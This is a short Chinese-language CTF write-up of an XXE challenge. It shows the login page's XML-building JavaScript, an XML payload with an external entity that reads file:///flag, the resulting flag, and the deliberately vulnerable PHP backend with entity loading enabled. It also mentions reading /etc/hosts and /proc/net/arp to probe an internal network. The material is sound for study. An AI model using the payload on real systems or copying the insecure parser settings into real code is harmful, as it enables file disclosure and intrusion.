xxe
XXE
发现输入的username被alert了
查源码
onclick="XMLFunction()"
抓包看xml格式
回来看控制台
发现js的xml应用
<script type="text/javascript">
function XMLFunction(){
var xml = '' +
'<?xml version="1.0" encoding="UTF-8"?>' +
'<root>' +
' <username>' + $('#username').val() + '</username>' +
' <password>' + $('#password').val() + '</password>' +
' </root>';
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
console.log(xmlhttp.readyState);
console.log(xmlhttp.responseText);
alert(xmlhttp.responseText);
}
}
xmlhttp.open("POST","login.php",true);
xmlhttp.send(xml);
};
</script>
构造xxe攻击
这是post包传的时候记得把注释删去
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ENTITY flag SYSTEM "file:///flag"><!--构造实体-->
]>
<root>
<username>&flag;</username><!--输出flag实体-->
<password>2333</password>
</root>
flag{6866a844-3788-4a9d-9909-1d9d9943f56f}
<?php
/**
* autor: c0ny1
* date: 2018-2-7
*/
$USERNAME = 'admin'; //账号
$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; //密码
$result = null;
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
try{
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$username = $creds->username;
$password = $creds->password;
if($username == $USERNAME && $password == $PASSWORD){
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
}else{
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
}
}catch(Exception $e){
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}
header('Content-Type: text/html; charset=utf-8');
echo $result;
?>
有admin密码了也没用
藏内网了,上次比赛ssrf题出过
- etc/hosts
- proc/net/arp
评论